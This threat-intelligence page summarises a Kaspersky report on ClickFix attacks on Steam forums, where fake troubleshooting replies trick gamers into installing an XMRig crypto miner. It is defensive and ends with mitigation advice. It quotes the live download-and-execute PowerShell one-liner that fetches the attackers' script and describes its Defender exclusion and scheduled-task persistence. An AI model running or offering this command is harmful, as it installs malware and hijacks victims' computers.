ClickFix on Steam forums: how malicious PowerShell commands install a crypto miner | Kaspersky official blog
Attackers are exploiting Steam forums by posting malicious PowerShell commands disguised as troubleshooting advice. The command downloads and executes a script that installs a crypto miner (XMRig) on victims' Windows machines. The script mimics a system optimization tool to deceive users and disables antivirus scanning on the miner's folder. The miner hijacks system resources to mine Monero cryptocurrency without user consent, degrading performance and hardware lifespan. The attack relies on social engineering to trick gamers into running the harmful command with administrator privileges.
AI Analysis
Technical Summary
This threat involves ClickFix attacks on Steam forums where attackers reply to gamers' technical questions with a malicious PowerShell command: 'irm msfconfig.icu | iex'. The command uses PowerShell's Invoke-RestMethod to download a malicious script from the attackers' server and Invoke-Expression to execute it immediately. The script pretends to perform system optimization tasks but actually installs the XMRig crypto miner in a hidden folder excluded from Microsoft Defender scans. It also creates a scheduled task to ensure persistence across reboots. The miner uses the victim's CPU and GPU to mine Monero cryptocurrency for the attackers' benefit.
Potential Impact
The attack results in unauthorized installation of a crypto miner that hijacks system resources, leading to degraded system performance and accelerated hardware wear. It also disables antivirus scanning on the miner's folder, reducing the effectiveness of built-in security protections. The attack exploits user trust and social engineering to gain administrator privileges, enabling persistent compromise of gaming PCs.
Mitigation Recommendations
Users should avoid running PowerShell or command prompt scripts suggested by strangers, especially with administrator privileges. Before executing any unfamiliar command, users should research its function and potential risks. Employing reliable security software with a gaming mode that does not interfere with gameplay but blocks malware download attempts is recommended. Users should keep security solutions active at all times, including during gaming sessions. No official patch is applicable as this is a social engineering attack rather than a software vulnerability.
ClickFix on Steam forums: how malicious PowerShell commands install a crypto miner | Kaspersky official blog
Description
Attackers are exploiting Steam forums by posting malicious PowerShell commands disguised as troubleshooting advice. The command downloads and executes a script that installs a crypto miner (XMRig) on victims' Windows machines. The script mimics a system optimization tool to deceive users and disables antivirus scanning on the miner's folder. The miner hijacks system resources to mine Monero cryptocurrency without user consent, degrading performance and hardware lifespan. The attack relies on social engineering to trick gamers into running the harmful command with administrator privileges.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat involves ClickFix attacks on Steam forums where attackers reply to gamers' technical questions with a malicious PowerShell command: 'irm msfconfig.icu | iex'. The command uses PowerShell's Invoke-RestMethod to download a malicious script from the attackers' server and Invoke-Expression to execute it immediately. The script pretends to perform system optimization tasks but actually installs the XMRig crypto miner in a hidden folder excluded from Microsoft Defender scans. It also creates a scheduled task to ensure persistence across reboots. The miner uses the victim's CPU and GPU to mine Monero cryptocurrency for the attackers' benefit.
Potential Impact
The attack results in unauthorized installation of a crypto miner that hijacks system resources, leading to degraded system performance and accelerated hardware wear. It also disables antivirus scanning on the miner's folder, reducing the effectiveness of built-in security protections. The attack exploits user trust and social engineering to gain administrator privileges, enabling persistent compromise of gaming PCs.
Defensive Guidance
Users should avoid running PowerShell or command prompt scripts suggested by strangers, especially with administrator privileges. Before executing any unfamiliar command, users should research its function and potential risks. Employing reliable security software with a gaming mode that does not interfere with gameplay but blocks malware download attempts is recommended. Users should keep security solutions active at all times, including during gaming sessions. No official patch is applicable as this is a social engineering attack rather than a software vulnerability.
Technical Details
- Classification
- {"confidence":0.65,"severitySource":"default","classifier":"rss-v2"}
- Article Source
- {"url":"https://www.kaspersky.com/blog/steam-forum-clickfix-attack-irm-iex/56285/","fetched":true,"fetchedAt":"2026-08-17T15:53:47.886Z","wordCount":1697}
Threat ID: 6a832e8bbf8831d5391f63e4
Added to database: 08/17/2026, 15:53:47 UTC
Last enriched: 09/12/2026, 01:50:08 UTC
Last updated: 10/01/2026, 09:55:22 UTC
Views: 675
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.